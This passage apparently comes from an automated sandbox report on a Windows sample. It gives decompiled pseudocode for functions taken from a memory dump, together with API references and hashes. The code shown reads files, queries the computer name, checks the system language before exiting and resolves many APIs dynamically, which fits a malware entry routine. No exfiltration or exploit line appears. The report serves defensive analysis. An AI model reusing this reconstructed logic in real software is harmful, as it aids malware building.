							_v28 = ( *(_v32 + 0x14) >> 1) +  *(_v32 + 0x14);
						}
					}
				} else {
					_v28 = _a4;
				}
				_v8 = 0;
				_t61 = E00401C20(_v32 + 0x18, _v28 + 1); // executed
				_v36 = _t61;
				_v24 = _v36;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00401100(_v24, E00401670(_v32), _a8);
				}
				E004015F0(_v32, 1, 0);
				 *_v32 = _v24;
				 *(_v32 + 0x14) = _v28;
				_t66 = E00401790(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t66;
			}

0x004019c3
0x004019c5
0x004019d0
0x004019d1
0x004019d8
0x004019df
0x004019e3
0x004019e9
0x004019ec
0x004019f5
0x00401a03
0x00401a23
0x00401a3f
0x00401a5c
0x00401a41
0x00401a4f
0x00401a4f
0x00401a3f
0x00401a05
0x00401a08
0x00401a08
0x00401a5f
0x00401a73
0x00401a78
0x00401a7e
0x00401ae3
0x00401aee
0x00401b01
0x00401b06
0x00401b10
0x00401b1b
0x00401b23
0x00401b2d
0x00401b35
0x00401b43

APIs

Part of subcall function 00401980: allocator.LIBCPMTD ref: 0040198F

allocator.LIBCPMTD ref: 00401A73

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 3699ba510369b678234fa6f2af8ebe35192483f0ad2ac9a48cc10a3850bc6069
Instruction ID: 5b71811d262db75ffb008ab28cf385efa538223288d26617eb69107bad1ee037
Opcode Fuzzy Hash: 3699ba510369b678234fa6f2af8ebe35192483f0ad2ac9a48cc10a3850bc6069
Instruction Fuzzy Hash: CB410CB0E0410ADFCB04DF98D891AAFB7B6FB48354F20812AE915B73D1D638A941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004149F0, Relevance: 1.6, APIs: 1, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004149F0(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				int _t67;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x84)) == 0) {
					if( *(_v20 + 0x7c) == 0) {
						 *((intOrPtr*)(_v20 + 0x14)) = 0x1000000;
						return 0;
					}
					_t67 = ReadFile( *(_v20 + 0x7c), _a4, _a8,  &_v16, 0); // executed
					_v12 = _t67;
					if(_v12 != 0) {
						 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v16;
						 *((intOrPtr*)(_v20 + 0x78)) = E00413060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v16);
						return _v16;
					}
					return 0;
				}
				if( *((intOrPtr*)(_v20 + 0x8c)) <  *((intOrPtr*)(_v20 + 0x88))) {
					_v8 =  *((intOrPtr*)(_v20 + 0x88)) -  *((intOrPtr*)(_v20 + 0x8c));
					if(_v8 > _a8) {
						_v8 = _a8;
					}
					E00409240(_a4,  *((intOrPtr*)(_v20 + 0x84)) +  *((intOrPtr*)(_v20 + 0x8c)), _v8);
					 *((intOrPtr*)(_v20 + 0x8c)) =  *((intOrPtr*)(_v20 + 0x8c)) + _v8;
					 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v8;
					 *((intOrPtr*)(_v20 + 0x78)) = E00413060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v8);
					return _v8;
				}
				return 0;
			}

0x004149f6
0x00414a03
0x00414ab9
0x00414b19
0x00000000
0x00414b20
0x00414ad0
0x00414ad6
0x00414add
0x00414aef
0x00414b0c
0x00000000
0x00414b0f
0x00000000
0x00414adf
0x00414a1b
0x00414a36
0x00414a3f
0x00414a44
0x00414a44
0x00414a62
0x00414a79
0x00414a8b
0x00414aa8
0x00000000
0x00414aab
0x00000000

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00414AD0

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b246df8e3a9d2a9d5c35d4ca1609b0fdbbbcfdeb73313907d8776be4043166f5
Instruction ID: ee08d54f1ce56c22ce831b4574c6a572aca0e1eed8468bf14319c86df82dd3cd
Opcode Fuzzy Hash: b246df8e3a9d2a9d5c35d4ca1609b0fdbbbcfdeb73313907d8776be4043166f5
Instruction Fuzzy Hash: 8741B8B5A00119EFCB04CF98C980FAEB7F5BF88304F208569E9299B355D731E941DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004148F0, Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E004148F0(void* __edi, void* __esi, void* __eflags, void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t36;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t64;

				_t63 = __esi;
				_t62 = __edi;
				_push(0xffffffff);
				_push(E0042643B);
				_t36 =  *0x4301f4; // 0x3b2bc12f
				 *[fs:0x0] =  &_v16;
				_v32 = E00404E60(__edi, __esi, __eflags, 0x4098, _t36 ^ _t64,  *[fs:0x0]);
				_v8 = 0;
				if(_v32 == 0) {
					_v48 = 0;
				} else {
					_v48 = E00404050(_v32, _a16);
				}
				_v28 = _v48;
				_v8 = 0xffffffff;
				_v20 = _v28;
				_t41 = E00412CB0(_v20, _a4, _a8, _a12); // executed
				 *0x432ab0 = _t41;
				if( *0x432ab0 == 0) {
					_push(8);
					_v44 = E00404E60(_t62, _t63, __eflags);
					_v24 = _v44;
					 *_v24 = 2;
					 *((intOrPtr*)(_v24 + 4)) = _v20;
					_t44 = _v24;
				} else {
					_v40 = _v20;
					_v36 = _v40;
					if(_v36 == 0) {
						_v52 = 0;
					} else {
						_v52 = E00404240(_v36, 1);
					}
					_t44 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t44;
			}

0x004148f0
0x004148f0
0x004148f3
0x004148f5
0x00414904
0x0041490f
0x00414922
0x00414925
0x00414930
0x00414943
0x00414932
0x0041493e
0x0041493e
0x0041494d
0x00414950
0x0041495a
0x0041496c
0x00414971
0x0041497d
0x004149ab
0x004149b5
0x004149bb
0x004149c1
0x004149cd
0x004149d0
0x0041497f
0x00414982
0x00414988
0x0041498f
0x004149a0
0x00414991
0x0041499b
0x0041499b
0x004149a7
0x004149a7
0x004149d6
0x004149e1

APIs

Part of subcall function 00404E60: _malloc.LIBCMT ref: 00404E7A

codecvt.LIBCPMTD ref: 00414996

Part of subcall function 00404E60: std::exception::exception.LIBCMT ref: 00404EAF
Part of subcall function 00404E60: std::exception::exception.LIBCMT ref: 00404EC9
Part of subcall function 00404E60: __CxxThrowException@8.LIBCMT ref: 00404EDA

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8Throw_malloccodecvt
String ID:
API String ID: 3802366972-0
Opcode ID: 65516c9ec497b00f2b65d682b8c0f692bdc010016ed4007c06f61a32a91265ef
Instruction ID: dfa4c6b68f695d195a3261a03b22ad4cc4c07bdc4f6c79637ebba9ac40f79c8c
Opcode Fuzzy Hash: 65516c9ec497b00f2b65d682b8c0f692bdc010016ed4007c06f61a32a91265ef
Instruction Fuzzy Hash: 233107B0D14209DFCB04DFA9D941BEEB7B0FB88314F10822AE516B7380D7785940CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4A0, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040F4A0(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x43149c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x431ac8;
					if( *0x431ac8 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00408F17(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00405A49(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0040f4a5
0x0040f4aa
0x0040f4c7
0x0040f4cc
0x0040f4ce
0x0040f4d0
0x0040f4d2
0x0040f4d2
0x0040f4d2
0x00000000
0x0040f4da
0x0040f4e3
0x0040f4e9
0x0040f4eb
0x00000000
0x00000000
0x0040f51f
0x0040f521
0x00000000
0x0040f4ed
0x0040f4ed
0x0040f4f4
0x0040f512
0x0040f515
0x0040f517
0x0040f519
0x0040f519
0x0040f4f6
0x0040f4f7
0x0040f4fd
0x0040f4ff
0x0040f4d3
0x0040f4d3
0x0040f4d5
0x0040f4d8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f501
0x0040f501
0x0040f504
0x0040f506
0x0040f508
0x0040f508
0x0040f50e
0x0040f50e
0x0040f4ff
0x00000000
0x0040f4ac
0x0040f4b0
0x0040f4b3
0x0040f4b6
0x00000000
0x0040f4b8
0x0040f4bd
0x0040f4c6
0x0040f4c6
0x0040f4b6
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00408822,00000000,?,00000000,00000000,00000000,?,004083FD,00000001,00000214), ref: 0040F4E3

Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d82e66436fce21d8571c17326f2ffb424c68f115f354af63cfe6861107ae204b
Instruction ID: 0bcd9a96758ee573beb90f3535d4c7ac3b72da11a871f97e33554206fa416c49
Opcode Fuzzy Hash: d82e66436fce21d8571c17326f2ffb424c68f115f354af63cfe6861107ae204b
Instruction Fuzzy Hash: DA01D431301215ABEB34AF65EC04B673395BBD1364F10863BEC1AEBAD0DB38DC048A58

Uniqueness

Uniqueness Score: -1.00%

Function 00412C20, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00412C20(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;

				_push(__ecx);
				_v8 = __ecx;
				if(( *(_v8 + 0x1c) & 0x000000ff) != 0) {
					if( *((intOrPtr*)(_v8 + 0x20)) == 0) {
						if( *(_v8 + 4) == 0) {
							 *((intOrPtr*)(_v8 + 0x14)) = 0x1000000;
							return 0;
						}
						SetFilePointer( *(_v8 + 4), _a4 +  *((intOrPtr*)(_v8 + 0x10)), 0, 0); // executed
						return 1;
					}
					if(_a4 <  *((intOrPtr*)(_v8 + 0x28))) {
						 *((intOrPtr*)(_v8 + 0x24)) = _a4;
						return 1;
					}
					 *((intOrPtr*)(_v8 + 0x14)) = 0x30000;
					return 0;
				}
				 *((intOrPtr*)(_v8 + 0x14)) = 0x2000000;
				return 0;
			}

0x00412c23
0x00412c24
0x00412c30
0x00412c47
0x00412c78
0x00412c9c
0x00000000
0x00412ca3
0x00412c8f
0x00000000
0x00412c95
0x00412c52
0x00412c68
0x00000000
0x00412c6b
0x00412c57
0x00000000
0x00412c5e
0x00412c35
0x00000000

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d71604db6fec4be1207dcab1404c9e182b981f92b1460fa6431c5401797251
Instruction ID: 1025bfa3c1fb4726a5c59c84ddd76f85376f96707e6bf9497156914aa1de4f59
Opcode Fuzzy Hash: 26d71604db6fec4be1207dcab1404c9e182b981f92b1460fa6431c5401797251
Instruction Fuzzy Hash: 74113074604204EBDB08CF54D344BDEB7B1AB59300F208189E5055B351D775EE92EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00417A10, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00417A10(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;

				if(_a4 != 0) {
					_v12 = _a4;
					if( *_v12 == 2) {
						_v8 =  *((intOrPtr*)(_v12 + 4));
						_t22 = E00417880(_v8); // executed
						 *0x432ab0 = _t22;
						_v20 = _v8;
						_v16 = _v20;
						if(_v16 == 0) {
							_v28 = 0;
						} else {
							_t26 = E00404240(_v16, 1); // executed
							_v28 = _t26;
						}
						_v24 = _v12;
						_push(_v24);
						E00404E04();
						_t25 =  *0x432ab0; // 0x0
						return _t25;
					}
					 *0x432ab0 = 0x80000;
					return 0x80000;
				}
				 *0x432ab0 = 0x10000;
				return 0x10000;
			}

0x00417a1a
0x00417a30
0x00417a39
0x00417a52
0x00417a58
0x00417a5d
0x00417a65
0x00417a6b
0x00417a72
0x00417a83
0x00417a74
0x00417a79
0x00417a7e
0x00417a7e
0x00417a8d
0x00417a93
0x00417a94
0x00417a9c
0x00000000
0x00417a9c
0x00417a3b
0x00000000
0x00417a45
0x00417a1c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb8322b1f6e3e1a8b280e4531e8d8cfbcbcfa88955bbe8d741a71e577752767
Instruction ID: 679793f8ccfb25e98cb5af2dab38616610ecc47be8336f414092fb61571c7ccd
Opcode Fuzzy Hash: 7bb8322b1f6e3e1a8b280e4531e8d8cfbcbcfa88955bbe8d741a71e577752767
Instruction Fuzzy Hash: 0B11E5B0E08208EFCB14EF94D9517AEBBB1BB44344F2041AAE9056B350D7796EC0DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2E0, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041B2E0() {
				signed int _v8;
				char _v276;
				long _v280;
				signed int _t7;
				int _t10;
				CHAR* _t11;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t7 ^ _t20;
				_v280 = 0x104;
				_t10 = GetComputerNameA( &_v276,  &_v280); // executed
				if(_t10 != 0) {
					_t11 =  &_v276;
				} else {
					_t11 =  *0x4322d4; // 0xc167e8
				}
				return E00404354(_t11, _t13, _v8 ^ _t20, _t17, _t18, _t19);
			}

0x0041b2e9
0x0041b2f0
0x0041b2f3
0x0041b30b
0x0041b313
0x0041b31e
0x0041b315
0x0041b315
0x0041b315
0x0041b331

APIs

GetComputerNameA.KERNEL32(?,00000104), ref: 0041B30B

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: eebfe3b019206971c170a9ee6f309522c52ae243993ee352773efe4b871ee841
Instruction ID: 9c951603334a3196eedb2f5d8ce0062fa3e7763144f1ac2ad3b1ae841299b97e
Opcode Fuzzy Hash: eebfe3b019206971c170a9ee6f309522c52ae243993ee352773efe4b871ee841
Instruction Fuzzy Hash: 8BF0657090010C8BCB1CDF64DD42AE9B3F8EB08700F4001EA9A2993240D7749A88DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F2, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B7F2(signed int __eax, signed int** __ecx, signed int* __esi) {
				signed int _t7;
				signed int** _t9;
				void* _t12;
				void* _t14;
				signed int* _t15;

				_t15 = __esi;
				_t9 = __ecx;
				_t7 = __eax;
				if((__ecx[3] & 0x00000040) == 0 || __ecx[2] != 0) {
					_t5 =  &(_t9[1]);
					 *_t5 = _t9[1] - 1;
					if( *_t5 < 0) {
						_t7 = E0040B68E(_t12, _t14, _t7, _t9); // executed
					} else {
						 *( *_t9) = _t7;
						 *_t9 =  &(( *_t9)[0]);
						_t7 = _t7 & 0x000000ff;
					}
					if(_t7 != 0xffffffff) {
						goto L7;
					} else {
						 *_t15 =  *_t15 | _t7;
						return _t7;
					}
				} else {
					L7:
					 *_t15 =  *_t15 + 1;
					return _t7;
				}
			}

0x0040b7f2
0x0040b7f2
0x0040b7f2
0x0040b7f6
0x0040b7fe
0x0040b7fe
0x0040b801
0x0040b813
0x0040b803
0x0040b805
0x0040b807
0x0040b809
0x0040b809
0x0040b81d
0x00000000
0x0040b81f
0x0040b81f
0x0040b821
0x0040b821
0x0040b822
0x0040b822
0x0040b822
0x0040b824
0x0040b824

APIs

__flsbuf.LIBCMT ref: 0040B813

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 48746035c8d98e9752f31ab4b8e97cf8c644e75d84aad8d493d03b062999833f
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: 13E09A314011008ACA241F20C0062327BA8DB4172AF34CAAFD5909A1F3D73F8443DAAC

Uniqueness

Uniqueness Score: -1.00%

Function 0041A380, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 40336c8259512cce58f89f8d61b1b1879afaacceea97e291bf12fce08afdded2
Instruction ID: 3c8f1d79d87c84db0684a3e850628d3effbe9715211d779297b264c74426fdcd
Opcode Fuzzy Hash: 40336c8259512cce58f89f8d61b1b1879afaacceea97e291bf12fce08afdded2
Instruction Fuzzy Hash: A9E012303442086BE7408E65DC41FA637E8A785740F108419F91DCB280D671E9559B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F540, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F540(intOrPtr _a4) {
				intOrPtr _v10;
				struct _SHFILEOPSTRUCT _v14;
				struct _SHFILEOPSTRUCT _v18;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _SHFILEOPSTRUCT _v36;
				int _t12;

				_v36 = 0;
				_v32 = 3;
				_v28 = _a4;
				_v24 = 0x42949b;
				_v20 = 0x414;
				_v18 = 0;
				_v14 = 0;
				_v10 = 0x4294ba;
				_t12 = SHFileOperation( &_v36); // executed
				return _t12;
			}

0x0041f546
0x0041f54d
0x0041f557
0x0041f55a
0x0041f566
0x0041f56a
0x0041f571
0x0041f578
0x0041f583
0x0041f58c

APIs

SHFileOperation.SHELL32(00000000), ref: 0041F583

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: d78f0f88244affa22c22d943ca27d22b1a55c3b15ba671f590ec3ee1307765fa
Instruction ID: 882c292eb77013e31a5bbbb2e8fed08838e142fcd70b20bfa47ffb38cd912db5
Opcode Fuzzy Hash: d78f0f88244affa22c22d943ca27d22b1a55c3b15ba671f590ec3ee1307765fa
Instruction Fuzzy Hash: 31E0C2B0D0421C9BDB00EF94D8587AEBBB4FB48304F408659D9046B240D3B986098BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6E0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A6E0(CHAR* _a4) {
				signed int _v8;
				intOrPtr _v12;
				long _t9;

				_t9 = GetFileAttributesA(_a4); // executed
				_v8 = _t9;
				if(_v8 == 0xffffffff || (_v8 & 0x00000010) != 0) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				return _v12;
			}

0x0041a6ea
0x0041a6f0
0x0041a6f7
0x0041a70a
0x0041a701
0x0041a701
0x0041a701
0x0041a717

APIs

GetFileAttributesA.KERNEL32(?), ref: 0041A6EA

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9def5948c8f160d00dc71cd55bfd5ac5a8e15a12c7ec24a005979c101a2a598e
Instruction ID: e03e7f51ea95acc2c6fc920af098f74b403825f68660cfe25e203b6a8b32b8d6
Opcode Fuzzy Hash: 9def5948c8f160d00dc71cd55bfd5ac5a8e15a12c7ec24a005979c101a2a598e
Instruction Fuzzy Hash: 26E08634D0530CEBCB10DFE4D9586DDBBB4EB01310F204299D8155B3C0D3349BA68B46

Uniqueness

Uniqueness Score: -1.00%

Function 00421400, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421400() {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t8;

				E00423050(0x4326f8); // executed
				E00419700(0x4326f8); // executed
				_t3 = E0041F4A0(); // executed
				_t9 = _t3;
				if(_t3 != 0) {
					_t4 = E0041B700(0x4326f8, _t8, _t9); // executed
					_t10 = _t4;
					if(_t4 != 0) {
						E00420BE0(_t6, _t10); // executed
					}
				}
				ExitProcess(0);
			}

0x00421408
0x0042140d
0x00421412
0x00421417
0x00421419
0x0042141b
0x00421420
0x00421422
0x00421424
0x00421424
0x00421422
0x0042142b

APIs

Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18370), ref: 00419752
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18080), ref: 00419767
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18490), ref: 0041977D
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C185B0), ref: 00419793
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18520), ref: 004197A8
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18538), ref: 004197BE
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18658), ref: 004197D4
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C182C0), ref: 004197E9
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C180A0), ref: 004197FF
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18460), ref: 00419815
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C17F20), ref: 0041982A
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18610), ref: 00419840
Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,00C18200), ref: 00419856

Part of subcall function 0041F4A0: GetUserDefaultLangID.KERNEL32 ref: 0041F4AD

ExitProcess.KERNEL32 ref: 0042142B

Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C1F
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C35
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C4B
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C61
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C77
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C8D
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CA3
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CB9
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CCF
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CE5
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CFB
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D11
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D27
Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D3D

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$AddressProc$DefaultExitLangProcessUser
String ID:
API String ID: 82748119-0
Opcode ID: 32394bd129dc164cd11832438fddca6f2a7be9a9b6adeee2cc25a03872417eb2
Instruction ID: 6fb307640b029766a7fb4233a35ca454179d9a6499e425c111d59f27594913c5
Opcode Fuzzy Hash: 32394bd129dc164cd11832438fddca6f2a7be9a9b6adeee2cc25a03872417eb2
Instruction Fuzzy Hash: 2DD0C9303142281295143BF76A1375E31885F95759F88102BEA19841D2EE8CE880807F

Uniqueness

Uniqueness Score: -1.00%

Function 004055AB, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004055AB(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E004054EF(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x004055b0
0x004055b2
0x004055b5
0x004055b8
0x004055c1

APIs

__fsopen.LIBCMT ref: 004055B8

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 5b05c73125da1926053be9fb26bd22456a7e96449116a2bcf6d461872288d809
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: C1C09B7244010C77CF111943DC02F563F19D7C0764F044021FB1C1D1619577D5659689

Uniqueness

Uniqueness Score: -1.00%

Function 0041C670, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C670() {
				struct HINSTANCE__* _t1;
				int _t2;

				_t1 =  *0x43274c; // 0x60900000
				_t2 = FreeLibrary(_t1); // executed
				return _t2;
			}

0x0041c673
0x0041c679
0x0041c680

APIs

FreeLibrary.KERNEL32(60900000), ref: 0041C679

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 06ebcda954c8efed7623fbeaa734fc165b916da4c9d32b0480696a03403f6e26
Instruction ID: 5c465659f1241fb045ba90c5d16aa579a6afb78240756381b75dedf848ff1fda
Opcode Fuzzy Hash: 06ebcda954c8efed7623fbeaa734fc165b916da4c9d32b0480696a03403f6e26
Instruction Fuzzy Hash: A6B01271100308C7850057D9BE08815339CE74C5007002020B10883120C7A0B4004669

Uniqueness

Uniqueness Score: -1.00%

Function 0040829B, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,0040FBD0,004314A0,00000314,00000000,?,?,?,?,?,00409837,004314A0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040829D

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: b1d5483f02894e43c792c39b6c48b5267291dd99513758d69e4c122340a36f96
Instruction ID: c383b3ccbb15514a8cee800333098f99a1a1b38af0a967ff43c9ff14ff01edf9
Opcode Fuzzy Hash: b1d5483f02894e43c792c39b6c48b5267291dd99513758d69e4c122340a36f96
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670, Relevance: 1.3, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A670(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _t20;

				_v12 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = LocalAlloc(0x40, _a8 + 1); // executed
					_v12 = _t20;
					if(_v12 != 0) {
						_v8 = 0;
						while(_v8 < _a8) {
							 *((char*)(_v12 + _v8)) =  *((intOrPtr*)(_a4 + _v8));
							_v8 = _v8 + 1;
						}
					}
				}
				return _v12;
			}

0x0041a676
